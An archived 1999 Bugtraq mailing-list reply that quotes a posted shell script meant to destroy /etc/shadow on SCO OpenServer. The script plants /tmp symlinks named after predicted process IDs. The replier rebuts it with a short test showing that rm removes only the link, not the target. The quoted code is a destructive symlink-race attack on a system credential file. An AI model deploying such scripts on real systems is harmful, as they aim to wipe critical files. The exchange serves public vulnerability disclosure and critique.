Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 1999_1

Bugtraq archives for 1st quarter (Jan-Mar) 1999: Re: Little exploit for startup scripts (SCO 5.0.4p).

Re: Little exploit for startup scripts (SCO 5.0.4p).

Peter van Dijk (peterATTIC.VUURWERK.NL)
Mon, 8 Mar 1999 08:43:15 +0100

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Detlef =?iso-8859-1?Q?H=FChnlein?=: "Call for Papers: CQRE"
Previous message: Marc Heuse: "Re: Linux /usr/bin/gnuplot overflow"
In reply to: leshka: "Little exploit for startup scripts (SCO 5.0.4p)."
Next in thread: =?iso-8859-1?q?Taneli_Lepp=E4?=: "Re: Little exploit for startup scripts (SCO 5.0.4p)."

On Sun, Mar 07, 1999 at 03:07:23PM +0300, leshka wrote:
> #!/bin/sh
> #
> #                                   ... The punishment for inobedience ...
> #                                                   (Cycle # 2)
> #
> #                This simple script can help to erase any file
> #                 (SCO OpenServer Enterprise System v 5.0.4p).

Umm.. I don't think so...

> if [ _$1 = "_" ]
> then
>     {
>      echo -n "File to delete [/etc/shadow]:"
>      read victim_file
>      if [ _$victim_file = "_" ]
>         then
>             victim_file="/etc/shadow"
>         fi
>     }
> else
>     victim_file=$1
> fi

nice.

> pid=`/bin/ps -ef|/bin/grep -v awk|/usr/bin/awk '/inetd/ { printf  $2 }'`

nice.

> lastpid=`expr $pid - 30`

good thinking!

> while [ $pid != $lastpid ]
>       do
>         pid=`expr $pid - 1`;ln -fs /etc/shadow /tmp/tps$pid

nice.

>       done
> echo Done ! File \"$victim_file\" will be destroyed after the next reboot.

No. rm -f removes just the symlink, not the target file.

Try this (tested on Linux, but SCO doesn't seem too broken to me):
# touch /etc/blah
$ ln -sf /etc/blah /tmp/blih
# rm -f /tmp/blih
# ls -al /etc/blah
-rw-r--r--   1 root     root            0 Mar  8 08:40 /etc/blah

Doesn't look very deleted to me...

Greetz, Peter.
--
.| Peter van Dijk           | <mo|VERWEG> stoned worden of coden
.| peterattic.vuurwerk.nl  | <mo|VERWEG> dat is de levensvraag
                            | <mo|VERWEG> coden of stoned worden
                            | <mo|VERWEG> stonend worden En coden
                            | <mo|VERWEG> hmm
                            | <mo|VERWEG> dan maar stoned worden en slashdot lezen:)

Next message: Detlef =?iso-8859-1?Q?H=FChnlein?=: "Call for Papers: CQRE"
Previous message: Marc Heuse: "Re: Linux /usr/bin/gnuplot overflow"
In reply to: leshka: "Little exploit for startup scripts (SCO 5.0.4p)."
Next in thread: =?iso-8859-1?q?Taneli_Lepp=E4?=: "Re: Little exploit for startup scripts (SCO 5.0.4p)."